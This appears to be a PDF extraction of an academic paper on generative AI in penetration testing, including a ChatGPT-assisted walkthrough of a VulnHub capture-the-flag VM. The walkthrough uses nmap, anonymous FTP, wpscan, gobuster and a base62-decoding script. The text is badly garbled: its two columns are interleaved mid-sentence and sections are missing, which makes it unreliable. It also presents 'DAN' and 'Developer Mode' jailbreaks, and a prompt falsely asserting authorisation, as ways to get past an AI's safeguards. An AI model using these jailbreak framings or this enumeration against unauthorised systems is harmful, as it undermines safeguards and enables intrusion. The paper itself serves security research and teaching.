Generative AI For Pentesting The Good The Bad The
Generative AI For Pentesting The Good The Bad The
https://doi.org/10.1007/s10207-024-00835-x
REGULAR CONTRIBUTION
Abstract
This paper examines the role of Generative AI (GenAI) and Large Language Models (LLMs) in penetration testing exploring
the benefits, challenges, and risks associated with cyber security applications. Through the use of generative artificial intelli-
gence, penetration testing becomes more creative, test environments are customised, and continuous learning and adaptation
is achieved. We examined how GenAI (ChatGPT 3.5) helps penetration testers with options and suggestions during the five
stages of penetration testing. The effectiveness of the GenAI tool was tested using a publicly available vulnerable machine
from VulnHub. It was amazing how quickly they responded at each stage and provided better pentesting report. In this article,
we discuss potential risks, unintended consequences, and uncontrolled AI development associated with pentesting.
Keywords Cyber security · Generative AI · Large language models · Penetration testing · ChatGPT 3.5
123
$10.5 trillion by 2025.1 Cyber threats, such as data breaches, – Finally, GenAI can be used to produce an excellent and
ransomware attacks, and identity theft, have become more accurate penetration testing report that does not miss any
complex, posing significant risks to individuals, businesses, key findings.
and governments alike. The consequences of these attacks
can be severe, resulting in financial loss, damage to rep- Limitations
utation, and even harm to human lives [37]. Therefore, it
is essential to proactively address and mitigate these risks The field of AI is currently evolving at a multiplicative rate
by implementing robust cyber security measures, including [34]. This paper is limited to the technologies, tools and tech-
advanced tools and techniques that can detect and counter- niques available prior to June 17, 2023. Moreover, the specific
act cyber threats. A penetration test [2], or pentest, can be version of ChatGPT 3.5 used in this paper corresponds to its
conducted to evaluate the risks or vulnerabilities in any organ- May 24, 2023 release [29].
isation’s network or public-facing applications. Initially a The rest of the paper is organised as follows: The Good
mundane process, there has been some advancements and (background of GenAI and its application in pentesting), Bad
automation introduced in pentesting [1] as the technology (overconfidence in AI, ethical and legal concerns, inherent
evolved. The advent of generative AI (GenAI) has sparked bias) and the Ugly (responsible AI, privacy and collaborative
significant interest [3] within the cyber security industry, work) are discussed in Sect. 2, followed by a literature review
particularly for its capabilities in enhancing the penetration in Sect. 3. Methodology is crafted in Sect. 4 with detailed
testing process. Its ability in replicating real-world scenar- experiments and steps for reproducing the commands. The
ios facilitates the development of advanced tools capable of results of the study have been discussed in Sect. 5 in relation
detecting a broader range of zero-day vulnerabilities. to the methods described in Sect. 4. Section 6 concludes the
OpenAI’s ChatGPT is used for the purpose of testing paper, followed by Sect. 7 explaining the areas that need to
GenAI although other similar tools can serve as an alterna- be addressed in the future.
tive. Rooted in a foundational Large Language Model (LLM)
that is trained on a massive corpus of text, ChatGPT has
demonstrated to be effective for penetration testing applica- 2 Background
tions.
This section presents a primer into the topics discussed in
Research question this paper. Section 2.1 summarises the concept of GenAI
segueing into Sect. 2.2 where its application to pentesting
This research seeks to investigate the potential advantages, is introduced. Section 2.3 explains the advantages, while the
limitations, and impact of integrating GenAI tools into tradi- challenges are listed in Sect. 2.4 and the potential risks and
tional pentesting frameworks, thereby providing a structured consequences of applying GenAI in pentesting in Sect. 2.5.
avenue to explore, experiment, and discuss the contributions Finally, Sect. 2.6 presents a guideline for how it can be best
of GenAI in cyber security. implemented.
"How can GenAI tools be applied to enhance the 2.1 Overview of generative AI and LLMs
efficiency of penetration testing methodologies in cyber
security?" GenAI is a subfield of artificial intelligence that focuses
on creating new data, patterns, or models based on exist-
Contributions ing data. It encompasses various techniques, including deep
learning, natural language processing (NLP), and computer
The following are the contributions of this paper: vision. DALL-E, MidJourney, Stable Diffusion, Google
Bard, Github CoPilot, Bing AI Chat and Microsoft 365
– Firstly, it discusses the advantages, challenges and poten- Copilot are among a few of the most prominent names in
tial consequences of using GenAI in cyber security GenAI today but perhaps the most popular is OpenAI’s
specifically, pentesting. GPT (Generative Pre-trained Transformer), a series of multi-
– Secondly, the applications of GenAI in a simulated pen- modal Large Language Models (LLMs) currently in its fourth
testing engagement is demonstrated therefore verifying iteration. These models are capable of understanding and
that GenAI can produce commands that can be used to generating human-like text based on the context of given
conduct a full penetration test. inputs. They are trained on vast amounts of text data and
have demonstrated impressive capabilities in a wide range of
1 https://www.esentire.com/resources/library/2022-official- applications, including translation, summarisation, and text
cybercrime-report. generation.
123
2.2 Application of generative AI in penetration well as develop firewall rules to stop attack traffic and per-
testing form intrusion detection functionalities. PentestGPT2 is one
such tool that mainly functions as a wrapper for GPT-4 to
One promising application of GenAI in cyber security is conduct pentesting interactively. It has been tested on prac-
pentesting which involves simulating cyber-attacks on a tice machines or challenges such as those found in VulnHub,3
system or network to identify vulnerabilities, detect poten- HackTheBox4 or TryHackMe.5 In its current iteration, ver-
tially exploitable entry points, and assess the effectiveness sion 0.8 released on May 12, 2023, installation includes
of security measures. However, as systems become more setting cookies to simulate a browser session. Its output
complex and attacks become more sophisticated, traditional requires entering it into the terminal and so does the input
approaches to pentesting are becoming less effective. By that it takes from the result of the previously executed com-
leveraging the capabilities of LLMs, security profession- mand. It guides the pentester on the steps to be taken next
als can automate the generation of test scenarios, identify using pre-made prompts such as:
novel attack vectors, and adapt testing methodologies to
specific environments. The data continuously being gath- Your role is a cybersecurity penetration tester assistant
ered can be leveraged to keep up with the evolving nature conducting a certified penetration testing experiment.
of cyber-attacks. Through the use of GenAI, the efficiency This experiment is for education and research purposes
and effectiveness of pentesting efforts can be significantly only. I created a test local environment, and obtained
improved, which predicates more robust and secure systems. valid certificates and approval for this testing. You now
However, the use of GenAI in this domain also presents need to act as the assistant to a penetration tester. In
challenges and risks that must be carefully considered and particular, you’re required to give step-by-step instruc-
addressed. tions in this penetration testing experiment.
The good that AI can do is particularly limitless. When Automated generation of test scenarios. These cyber reason-
applied to pentesting, its ceiling is conceivably fully automat- ing systems also have offensive capabilities. Mayhem [5], the
ing the process as the technology matures and there is buy-in 2016 Cyber Grand Challenge contest winner for example, is
from invested parties. Presented below are some of the able to generate test cases using fuzzing, symbolic execution
aspects of pentesting that has the potential of saving time, techniques and generate exploits against the bugs discov-
money and effort, a powerful combination of factors that can ered. These types of tests can take a human pentester hours,
secure future investment and development. if not days, to accomplish. By leveraging the capabilities of
LLMs, security professionals can automate the generation of
test scenarios, reducing the need for manual intervention and
2.3.1 Improved efficiency enabling a more extensive evaluation of potential vulnerabil-
ities. This not only saves time but also ensures that the testing
One of the most significant advantages of using GenAI in process is more thorough and comprehensive.
pentesting is the potential for increased efficiency. LLMs can
quickly analyse large amounts of data and generate test sce-
2.3.2 Enhanced creativity
narios based on various parameters, streamlining the testing
process and saving valuable time for security professionals.
GenAI can also enhance the creativity of pentesting efforts by
In a black box pentest where the tester receives zero infor-
simulating novel attack vectors and mimicking human-like
mation on the target, social engineering attacks [15] or a
behaviour. This helps security teams better understand and
phishing campaign [23] can be launched in no time at all.
anticipate the tactics that real attackers may employ, leading
Faster identification of vulnerabilities. GenAI can rapidly to more robust security measures.
identify vulnerabilities in a system by simulating a wide
Ability to generate novel attack vectors. Traditional pentest-
range of potential attack scenarios. This allows security
ing methods may overlook unconventional attack vectors
teams to focus their efforts on the most critical vulnerabilities
and implement the necessary countermeasures more swiftly.
2 https://github.com/GreyDGL/PentestGPT.
In 2016, the Defense Advanced Research Projects Agency
3
(DARPA) held the Cyber Grand Challenge, a competition in https://vulnhub.com/.
4
which teams were tasked with developing autonomous sys- https://www.hackthebox.com/.
tems that could identify and patch software vulnerabilities as 5 https://tryhackme.com.
123
due to the limitations of human imagination or experience. produce an AI-driven tool [39] specifically for isolated net-
GenAI, however, can create a diverse array of potential attack works in Operational Technology (OT) domains that does
scenarios, uncovering vulnerabilities that may have other- not rely on signatures, heuristics or rules that require net-
wise gone unnoticed. DeepExploit is one such system which work connectivity. It utilises a predictive approach through
uses Asynchronous Actor-Critic Agents (AC3), a reinforce- an agent that is hosted and executed on-device.
ment learning algorithm, to learn from Metasploitable about
which exploit is to be used against specific targets [41]. Pre- 2.3.4 Continuous learning and adaptation
sented at DEFCON 25, an annual hacker convention, was
DeepHack [33], an automated web pentesting tool able to Another advantage of using GenAI in pentesting is its ability
craft SQL injection strings without prior knowledge of the to continuously learn and adapt based on new information
system and only relying on the target database’s responses. and past experiences. This allows for real-time adjustments
to the testing process and ensures that the pentesting efforts
Mimicking human-like behaviour. GenAI can simulate the
remain relevant and up to date.
behaviour of real attackers by learning from historical attack
patterns and adapting to new tactics. This provides secu- Real-time adjustments to the testing process. As GenAI mod-
rity professionals with a more realistic understanding of els receive feedback from the pentesting process, they can
how adversaries may operate, enabling them to implement refine their approach and make real-time adjustments to their
more effective countermeasures. Chen, et al. [8] discusses tactics. This continuous improvement enables security pro-
GAIL-PT (Generative Adversarial Imitation Learning-based fessionals to stay ahead of evolving threats and maintain a
intelligent Penetration Testing), a state-action pair-based high level of security. AttackIQ provides a service that sim-
automated penetration testing framework, which involves ulates breaches and attacks [4] for the purpose of validating
creating the penetration testing experts’ knowledge base with security controls, finding security gaps or used to test and
which to base the training of the model upon. It was tested teach ML tools to ensure that it adapts to threats and refine
against Metasploitable2 and outperformed the state-of-the- its accuracy and effectiveness.
art method, DeepExploit.
Learning from past tests and experiences. GenAI models can
learn from the successes and failures of past tests, incor-
2.3.3 Customised testing environments porating this knowledge into their future testing efforts.
Its capacity to analyse historical data on successful attacks
GenAI can be tailored to the unique needs of individ- against an organisation including tactics, techniques, and pro-
ual organisations, allowing for customised testing environ- cedures (TTPs) used by attackers, allows it to generate new
ments that account for specific systems, infrastructures, and attack scenarios based off previous successful attacks with
domain-specific knowledge. slight modifications accounting for changes in the organisa-
tion’s security posture. It can also look at unsuccessful attacks
Adaptable to unique systems and infrastructures. GenAI
and analyse the types of defences blocking those attacks and
models can be trained on data specific to an organisation’s
use that information to generate new attack scenarios bypass-
systems and infrastructure, ensuring that the pentesting pro-
ing those defences and allow security teams to identify and
cess is aligned with the unique requirements of the target
remediate proverbial chinks in their cyber security armour.
environment. This enables security teams to focus on vulner-
abilities that are most relevant to their organisation. CyCraft
2.3.5 Compatibility with legacy systems
APT Emulator [11] was designed to "generate attacks on
Windows machines in a virtualised environment" for the pur-
Similar to how a child born after 2010 can eventually fig-
pose of demonstrating how a machine learning (ML) model
ure out how to interface with a rotary phone, GenAI can
can detect cyber-attacks and trace it back to its source. This
interface with and "understand" legacy computer systems
model was used in Fuchikoma [10], a threat-hunting ML
from receiving training on a large corpus of text data. Once
model based off open-source software.
an unsupervised language model has undergone pretraining,
Incorporation of domain-specific knowledge. By incorpo- it can then be fine-tuned using labelled data which can be
rating domain-specific knowledge into the GenAI models, specific to legacy systems and has the effect of improv-
security professionals can ensure that the pentesting pro- ing performance and conditioning its focus on this task.
cess is more contextually relevant and effective. This may Many large organisations still rely on mainframe systems
include industry-specific regulations, compliance require- for critical business operations and most of the time, these
ments, or unique organisational policies and procedures. are often complex and difficult to maintain which makes
DeepArmor, an endpoint detection and protection solution them highly vulnerable to security threats. Similarly, out-
by SparkCognition, has partnered with Siemens Energy to dated and insecure protocols and older software that are
123
no longer supported by the vendor are also vulnerable to professional is at this point still crucial in interpreting results
known exploits and attacks. Training AI models on data and determining its appropriateness in the specific context.
specific to legacy systems can allow it to generate possible
AI-generated false positives and negatives. GenAI models,
exploits and help cyber security teams to identify and reme-
like any other technology, are not infallible. They may gener-
diate these vulnerabilities. For instance, these systems can
ate false positives, identifying vulnerabilities that do not pose
be modernised through NLP-based interfaces that translate
a real threat, or false negatives, overlooking actual vulnera-
modern programming languages or using Application Pro-
bilities. Security professionals must be vigilant in reviewing
gramming Interface (API) wrappers or API calls into legacy
the AI-generated results and address any discrepancies to
system commands or instructions. This way, developers are
ensure a comprehensive and accurate assessment of the tar-
able to use familiar tools and languages to interact with the
get environment. Papernot, et al. [32] posited (correctly) that
legacy system. GenAI can also be used to refactor legacy
ML models are vulnerable to malicious inputs and can be
code and convert it to a more modern form.
modified to "yield erroneous model outputs while appearing
unmodified to human observers". Images can be modified in
a way that is imperceptible to humans but can cause models
to misclassify the image, or text can be subtly changed such
as altering the word order causing the model to misinterpret
2.4 The bad: challenges and limitations of GenAI in the intended meaning. In both examples, GenAI can serve as
pentesting a vessel for false or misleading information.
While GenAI offers many advantages in pentesting, it is GenAI continues to creep into our daily lives at an accel-
crucial not to become overly reliant on these technologies. erated and profound rate. While these advancements offer
Human oversight remains essential for ensuring accurate and substantial advantages to businesses, governments, and indi-
effective results, as well as identifying and addressing any viduals, the associated challenges are equally significant.
false positives or negatives generated by the AI. As an exam- The rapid transformation driven by technology is altering the
ple, one security vulnerability is the input that a LLM ingests ways in which we live, work, and govern at an unparalleled
may have come from an untrusted, or worse, maliciously speed. This evolution generates new employment opportu-
injected [16]. In the paper, a simulated Wikipedia page con- nities, fosters connections and generates prosperity overall
taining incorrect information was used as training data which while on the other hand, it renders some professions obso-
has the effect of contaminating the output of a user query, an lete, contributes to divisive ideologies and can also intensify
attack bearing similarities to "search poisoning". disparity. In essence, the situation is intricate. Currently, the
ethical ramifications of GenAI and its integrations and appli-
Human oversight is still essential. Despite the capabilities of
cations are more salient than at any previous point in the past
GenAI, human expertise remains a critical component of the
few years with it recently coming into the public’s view. The
pentesting process. Security professionals must evaluate the
swift progress of technology-driven transformation continu-
AI-generated results, validate the identified vulnerabilities,
ally outpaces the efforts of policymakers and regulators, who,
and make informed decisions about the necessary counter-
burdened with the time-consuming process of enacting or
measures. Overreliance on AI without human intervention
updating legislation, policies, regulations, consistently strug-
may lead to overlooked vulnerabilities or other security
gle to keep up. This means governments can only respond
issues. In the infamous Capital One 2019 breach, the auto-
rather than be proactive in their approach. And as with any
mated Intrusion Monitoring/Detection system in place did
disruptive technology, the use of GenAI raises ethical and
not raise the necessary alarms allowing the intruder to main-
legal concerns especially in pentesting where the risk of
tain presence in their network for more than 4 months and
unauthorised access to sensitive data or systems may have
exfiltrate a substantial amount of data [22]. This incident
severe consequences, and that the information gleaned may
highlights the critical role of human oversight in the pen-
be misused by malicious actors.
testing process as even the most advanced automated tools
require expert configuration and validation. Novel attacks Unauthorised access to sensitive data. Pentesting often
and vulnerabilities can also be overlooked since GenAI involves accessing sensitive data or systems to identify vul-
models are usually trained on known attack patterns and tech- nerabilities. While GenAI may streamline this process, it also
niques. It might be able to detect and identify a threat but fail raises concerns about the potential misuse of this access or
to recognise the complexity of the attack. Companies might the inadvertent exposure of sensitive information. Security
consider AI to be sufficient but the expertise of a security professionals must ensure that they adhere to ethical guide-
123
lines and legal requirements to protect the confidentiality and 2.5 The ugly: potential risks and unintended
integrity of the data involved. consequences
Privacy issues. In the first instance, OpenAI’s scraping of
2.5.1 Escalation of cyber threats
data from publicly available books, articles, websites and
posts would have included personal information obtained
The increasing sophistication of GenAI in pentesting may
without consent, a clear violation of privacy. While the data
inadvertently lead to an escalation of cyber threats, as attack-
is publicly available, using it can be a breach of textual
ers adapt to these advanced technologies and develop new
integrity which is a legal principle requiring information not
tactics to exploit vulnerabilities. While it can be used for
be revealed outside of the context in which it was originally
good in pentesting as discussed in Sect. 2.1 Improved Effi-
produced [14]. Another privacy risk that pentesters may come
ciency, the same strategy can also be employed by malicious
across is providing AI platforms with sensitive information,
actors. Gone are the days when phishing emails are easily
such as code, that could be used for training its model and
filtered through spelling mistakes and obvious grammatical
therefore be made available to anyone asking the right ques-
errors [19]. Europol issued a press release [13] identifying
tions. More and more tech companies are banning the use
areas of concern as LLMs continue to improve thus empow-
of AI because of this. Samsung recently banned the use of
ering criminals to abuse its capabilities for malicious use.
ChatGPT on company devices after employees were caught
These include its ability to create hyper-realistic text, audio
uploaded sensitive code [18]. Instead, they are reportedly
or even video "deepfakes" that can reproduce language pat-
preparing in-house AI tools as an alternative. Microsoft, who
terns or impersonate writing styles of specific individuals or
recently invested US$10 billion on OpenAI [25] [30], plans
groups. Trust is easily acquired and the propagation of dis-
to offer a privacy-focused version of ChatGPT that will run
information is easily spread when it comes from a verified
on dedicated cloud servers where data is isolated from other
authority.
customers and is tailored to companies that have concerns
regarding data leaks and compliance [9]. Advanced persistent threats. As GenAI models become more
capable of simulating complex attack scenarios, there is a risk
Potential for misuse by malicious actors. As GenAI technolo-
that malicious actors will also adopt these technologies to
gies become more advanced, there is a risk that they may be
create advanced persistent threats (APTs). APTs are highly
co-opted by malicious actors to develop more sophisticated
targeted, stealthy, and often state-sponsored cyberattacks that
cyberattacks. This highlights the importance of securing
can cause significant damage to an organisation’s infrastruc-
GenAI models and technologies, as well as fostering collab-
ture and reputation. Any enterprising criminal may be able to
oration between organisations and governments to prevent
use GenAI to create malicious code with only a small amount
their misuse.
of technical knowledge [44]. During the early days, a group
of researchers [6] showcased how ChatGPT was used to cre-
ate malicious VBA code embedded in an Excel document
2.4.3 Inherent bias in the model
through iteration and providing it with the creative prompts.
GenAI models are only as good as the data they are trained Autonomous and self-propagating attacks. The advance-
on. Biased or unrepresentative training data may result in ments in GenAI may lead to the development of autonomous
unfair outcomes, which can have significant consequences and self-propagating cyberattacks. These attacks could be
in the context of cyber security. designed to automatically adapt and evolve based on the tar-
get environment, making them more challenging to detect
Possibility of biased or unfair results. If GenAI models are
and defend against.
trained on biased or unrepresentative data, they may generate
biased test scenarios or overlook vulnerabilities that are spe- Researchers from CyberArk [38] were able to create poly-
cific to certain systems, user groups, or industries. Security morphic malware by simply prompting ChatGPT to regen-
professionals must be aware of these potential biases and take erate multiple variations of the same code, thus making it
steps to ensure that their AI models are trained on diverse and unique each time or add constraints over each iteration to
representative datasets. bypass detection. In February 2023, BlackBerry conducted
a survey of 1,500 IT decision-makers revealing the percep-
Training data quality and representativeness. Ensuring that
tion that ChatGPT is already being used by nation-states for
GenAI models are trained on high-quality, representative data
malicious purposes and that many are concerned about its
is essential for producing accurate and reliable results in pen-
potential threat to cyber security [7] either through its use as
testing. This may involve curating and augmenting training
a tool to write better malware or enhance their skills.
datasets, as well as monitoring and updating the AI models
as new data becomes available.
123
123
fact that they are closely related, our work is focused on test- open-source Debian-based Linux distribution popular among
ing and certifying the commands generated by GenAI tools, Penetration Testers, Security Researchers, Reverse Engi-
and we ensure that the testing is completed with recommen- neers and those in the Cyber Security industry due to the
dations. bundle of pentesting tools already installed, is the OS run-
A phishing attack scenario using ChatGPT is presented ning on the pentester’s machine or the local machine as it
by Grbic and Dujlovic [15], along with an overview of social will be referred to throughout this paper. The target machine
engineering attacks and their prevention. A JavaScript is that pentesting was performed on, or the remote machine,
used in the second part of the paper to improve the phish- was randomly selected from VulnHub, a repository of offline
ing attack. While it is interesting to see how phishing attacks VMs that can be used by learners for practicing their skills
can be easily launched with ChatGPT, it hasn’t been tested within their own environments. "PumpkinFestival", the final
how they pass through organisation-level defence controls. level of the 3-part Mission-Pumpkin series [21] by Jayanth
Additionally, many other tools can be used to create highly released in 17th July 2019 was selected to be the target for
sophisticated phising emails besides GenAI. the experiment. It contained various vulnerabilities that sim-
While there is plenty of secondary literature available, ulate real-world scenarios. The ultimate goal was to crack
some blogs provide in-depth discussion and technical details or obtain root access to the system and collect flags along
on how to use GenAI tools [12, 26, 35]. Our paper is the first the way. As a background, Capture the Flag (CTF) [24] is
of its kind to perform an in-depth and step-by-step analysis a Cyber Security competition held to test participants’ skills
for penetration testing using GenAI. in information security. It was adapted from the traditional
outdoor game where two or more teams each have a flag with
the objective of capturing the other teams’ flag (which may
4 Methodology be hidden or buried) located at their respective bases and to
bring it safely back to their own. This attack-defence for-
4.1 Preparation mat is one of two CTF formats and was first held in 1993 at a
cyber security conference held annually in Las Vegas, Nevada
A series of preparatory steps was undertaken prior to con- called DEFCON. The other is a Jeopardy-style format where
ducting the pentesting engagement using GenAI. These steps teams attempt to complete as many of the challenges as pos-
included selecting the most suitable AI for the task, estab- sible, each of varying difficulty and from a diverse range of
lishing a reliable infrastructure to support the activity, and security topics.
devising a method for the pentester to interface with the API.
Once the preparations were completed, the experimentation 4.1.3 Integration of AI into the environment
was able to begin.
The final step in the preparation process was to integrate
4.1.1 Selection of the GenAI model ChatGPT’s API into the pentesting environment. For this,
Shell_GPT (sgpt [43], a Python-based command line inter-
Stage one involved selecting an appropriate GenAI. With face (CLI) tool that makes use of ChatGPT’s API to answer
ChatGPT being the most popular tool among GenAIs, it will questions, generate shell commands, code snippets and doc-
be used in the succeeding experiments to demonstrate tech- umentation, was integrated onto the pentesting environment.
niques in which it can be applied to each phase of pentesting. Using ChatGPT’s API to connect with tools used in pen-
Choosing OpenAI’s ChatGPT due to its advanced language testing such as Nmap [27], Nessus and OpenVAS involve
understanding and generation capabilities proved to be the using Python or other scripting language to create an inter-
most obvious choice. Its corpus of text was trained on a action between ChatGPT and each tool. Doing so enables
diverse range of publicly available material which makes it direct interfacing for the execution of scans and interpre-
capable of generating human-like text based on the input pro- tation of results automatically. Without this integration, it
vided. This feature was particularly useful in the context of is as if the prompts were issued through the web interface
pentesting, where clear, concise and accurate communication instead. This advantage allows for automated guidance dur-
is essential. ing the pentesting process. As the tools generate output,
ChatGPT can immediately interpret the results and provide
4.1.2 Preparation of the pentesting environment immediate advice on the next steps and reducing the time
spent on analysing the results manually. There is also the
Oracle VM VirtualBox, a type 2 hypervisor running atop the advantage of contextual understanding by ChatGPT directly
host machine’s Windows operating system (OS), was used as interacting with the output and can lead to more accurate
the virtualisation software to manage the pre-built Kali Linux or relevant suggestions. Moreover, the pentesting workflow
virtual machine (VM) from kali.org [28]. Kali Linux, an becomes more streamlined and reduces the need for manual
123
handling of input and output between the tool and the AI. below. Each step begins with a short description of its objec-
Ultimately, integrating ChatGPT to the CLI in the experi- tive followed by the Terminal Input for GenAI which pertains
mentation phase allowed for the evaluation of the practical to the prompt used for Shell_GPT (sgpt [43], the inter-
applicability and effective of GenAI in real-word pentest- face between the local machine and the GenAI, to extract
ing scenarios. Assessing how well it can interpret the output its response. The result of the prompt is subsequently shown
of professional penetration testing tools and provide useful under Terminal Output and finally, it concludes with an expla-
guidance based on that output is one of the goals in the exper- nation of that step. For conciseness, prompts that were used
iment. As an aside, the experimentation phase makes two during the trial-and-error process was excluded.
distinctions between sgpt from ChatGPT. Where sgpt is
mentioned, ChatGPT is also indicated. However, where Chat- Step 1 - Find the local machine’s IP address.
GPT is specifically mentioned does not specifically denote
that sgpt is concurrently used. There is also the distinction Objective: Establishes the initial connectivity information
between ChatGPT in general and ChatGPT using its web necessary for further penetration testing activities by identi-
interface which is explicitly stated. fying the local machine’s IP address.
Terminal Input for GenAI:
4.1.4 Cracking with the help of GenAI
sgpt --shell "find my local ip
With the setup complete, the pentesting experiment pro- address"
ceeded through prompts or interactions with ChatGPT via
the CLI through sgpt’s feature to execute shell commands Terminal Output:
as well as regular prompting of the AI for guidance on how to
proceed at each phase. Note that while the target VM selected ip addr show | grep "inet" | awk
has not been pentested by the author prior to the experi- '{print $2}' | cut -d '/' -f1
ment, pentests have been conducted on similar machines
from VulnHub and elsewhere. Essentially, the approach in Explanation: Knowing the Internet Protocol (IP) address and
this experiment was to simulate a beginner pentester who has specifying which network interface card (NIC) is in use are
previously used pentesting tools manually. As a beginner, the two pieces of information necessary for subsequent pen-
commands, arguments and parameters to various pentesting testing phases. Determining whether the pentest is being
tools are not yet ingrained in memory and constantly referring conducted inside or outside the target network is crucial for
to manuals and online guides is necessary. This highlights the selecting appropriate scanning and attack techniques. Differ-
potential for using ChatGPT as an aid in pentesting. entiating between the local IP address in logs and network
Jail breaking ChatGPT. Due to policies put in place by Ope- traffic allows for easier interpretation of the results.
nAI, ChatGPT and their other GenAI models are bound to
not violate their content policy of using it to produce materi- Step 2 - Probe the network.
als that condone illegal activity, such as to generate malware
[31] which pentesting can be misconstrued as. ChatGPT will Objective: Enumerates active hosts on the target network to
outright refuse to output information that have negative con- identify potential targets and understand the network layout,
notations or effects. When queried for the "list of IP addresses aiding in the planning of subsequent attack vectors.
associated with tesla.com" in its database for example, it will Terminal Input for GenAI:
instead reply with how to obtain this information (see Fig. 1).
Jail breaks such as "DAN" (Do Anything Now) or "Devel- sgpt --shell "probe the network
oper Mode" [45] while unethical and infringes on OpenAI’s 10.0.2.0/24"
usage policies, is a method that security researchers and
hackers alike used to extract information that would oth- Terminal Output:
erwise not be available. It allowed ChatGPT to bypass its
programmed ethical barriers to output implicitly immoral or nmap -sn 10.0.2.0/24
unethical responses.
Explanation: Similar to finding the local machine’s IP
4.2 Experimentation address, enumerating the network helps determine which
hosts are active on the target network and identify potential
From Reconnaissance to Exploitation. A summary of the targets for further assessment and exploitation. It determines
steps taken in the simulated pentesting engagement is listed network topology including IP ranges, subnets and assists in
123
understanding the network layout crucial for planning sub- sgpt --shell "login anonymously
sequent attack vectors. to ftp 10.0.2.15, list the
contents and download the file
Step 3 - Scan the remote machine. secrets\token.txt"
Terminal Output:
Objective: Discovers open services, ports, and the operating
system running on the identified target, assisting in pinpoint-
ing potential vulnerabilities for exploitation. ftp 10.0.2.15; anonymous; ls;
get secrets/token.txt
Terminal Input for GenAI:
Explanation: After successfully logging in to the FTP server
sgpt --shell "scan 10.0.2.15 on anonymously, directory traversal was performed which
all ports to find out OS, resulted to discovering the file named secrets/
vulnerabilities" token.txt and then eventually downloaded.
123
FTP login, finding out its contents was the next step which Terminal Output:
then revealed the first token.
curl http://10.0.2.15/store/
Step 6 - HTML source code. track.txt
Objective: Inspect the source code of a webpage served by Explanation: Another URL identified during the nmap scan
an Apache server on the remote machine to gather additional revealed a third user, admin, which was also added to
information. users.txt.
Terminal Input for GenAI:
Step 9 - Domain identified: pumpkins.local.
sgpt --shell "show the source
code of http://10.0.2.15" Objective: Identify the domain and modify the hosts file to
ensure proper domain resolution to further facilitate interac-
Terminal Output: tion with the target network.
Terminal Input for GenAI:
curl http://10.0.2.15
sgpt --shell "add 10.0.2.15
Explanation: Another service running on the remote machine to hosts as pumpkins.local"
is an Apache webserver on port 80 that serves the Pumpkin
Festival webpage. sgpt was used to view its source code. Terminal Output:
Objective: Discover other users and URLs by examining net- curl http://pumpkins.local |
work scan results, enhancing the attacker’s understanding of grep Token
the target system.
Terminal Input for GenAI: Explanation: Using the same technique in step 6, the HTML
source code of http://pumpkins.local was curled but this time
sgpt --shell "show the source filtering for the word Token.
code of http://10.0.2.15/store/
track.txt" Step 11 - Wordpress scan.
123
Objective: Aid the exploitation phase by conducting a scan - The upload directory has listing enabled, which could
on a WordPress site to identify possible vulnerabilities. potentially allow attackers to view and download sen-
sitive files.
Terminal Input for GenAI:
To further investigate these potential vulnerabilities,
you could perform additional scans and tests using tools
sgpt --shell "scan wordpress such as Metasploit, Burp Suite, or OWASP ZAP. These
site http://pumpkins.local tools can help you identify and exploit specific vulner-
and output it in a file abilities in the WordPress installation, and can provide
called wpscan.txt" more detailed information about the security posture of
the target system.
Terminal Output:
Explanation: The contents of wpscan.txt was piped or
wpscan -url http://pumpkins forwarded to sgpt in chat mode which gave an output of its
local -o wpscan.txt analysis listing vulnerabilities that can be further exploited.
Step 12 - Piping results into sgpt for analysis. Terminal Input for GenAI:
Based on the output of the WPScan tool, there are sev- Step 14 - Gobuster scan with wordlist.
eral potential vulnerabilities that could be exploited in
the WordPress installation on the target machine. Here Objective: Perform a directory and file brute force enumer-
are some of the key findings: ation on the WordPress site using gobuster to discover
- The WordPress version identified (4.9.3) is insecure additional resources or endpoints.
and was released on 2018-02-05. This means that there
may be known vulnerabilities that could be exploited to Terminal Input for GenAI:
gain unauthorized access to the system or compromise
its security. sgpt --shell "gobuster scan
- The external WP-Cron seems to be enabled, which http://pumpkins.local for php,
could potentially be used to launch denial-of-service html,txt,jpg,gif,png,zip,tar,gz,
attacks against the WordPress site. gpg,pem using wordlist dirbuster
- The version of the "twentyseventeen" theme in use directory-list-2.3-medium but
is out of date (version 1.4), which could potentially do not display progress"
contain known vulnerabilities that could be exploited to
gain unauthorized access to the system or compromise Terminal Output:
its security.
- Registration is enabled, which could potentially allow gobuster dir -w /usr/share/dir
attackers to create new user accounts with elevated priv- buster/wordslists/directory-
ileges. list-2.3-medium.txt -u http://
123
Explanation: To further enumerate the Wordpress site, a tool sgpt --chat pentesting "python
called gobuster in tandem with a wordlist containing a script to decode base62 hash
list of commonly used filenames was used for this scan. K82v0SuvV1En350M0uxiXVRTmBrQIJQN
78s" > b62dec.py"
Step 15 - license.txt and the third token.
Terminal Output:
Objective: Retrieve a token among the discovered files. Here is a Python script that decodes the base62 hash
Terminal Input for GenAI: "K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s"
using the steps I outlined in my previous response:
sgpt --shell "get content of
http://pumpkins.local/license. 1 #```
txt filter for Token" 2 base62_dict = {
3 '0': 0,
Terminal Output: 4 '1': 1,
5 '2': 2,
6 ...
curl http://pumpkins.local/lic
7 'X': 59,
ense.txt | grep Token
8 'Y': 60,
9 'Z': 61
Explanation: A file named license.txt was revealed in10 }
the gobuster scan which was found to contain another11
token. 12 base62_str =
13 "K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s"
Step 16 - Show the contents of readme.html.txt. 14 base10_num = 0
15 for i, char in enumerate(base62_str[::-1]):
16 base10_num += base62_dict[char] * (62 ** i)
Objective: Display the contents of a file for inspection and
17
verification.
18 ascii_str = ""
Terminal Input for GenAI: 19 while base10_num > 0:
20 ascii_str = chr(base10_num % 256)
sgpt --shell show the contents 21 + ascii_str
of readme.html.txt" 22 base10_num //= 256
23
24 print(ascii_str)
Terminal Output: 25 #```
26
Explanation: From the gobuster scan, a file named Explanation: sgpt was used to identify the cipher and then
readme.html.txt was also discovered. It was found to prompted to create a python script to decode which was
contain a coded message. revealed to be a password.
123
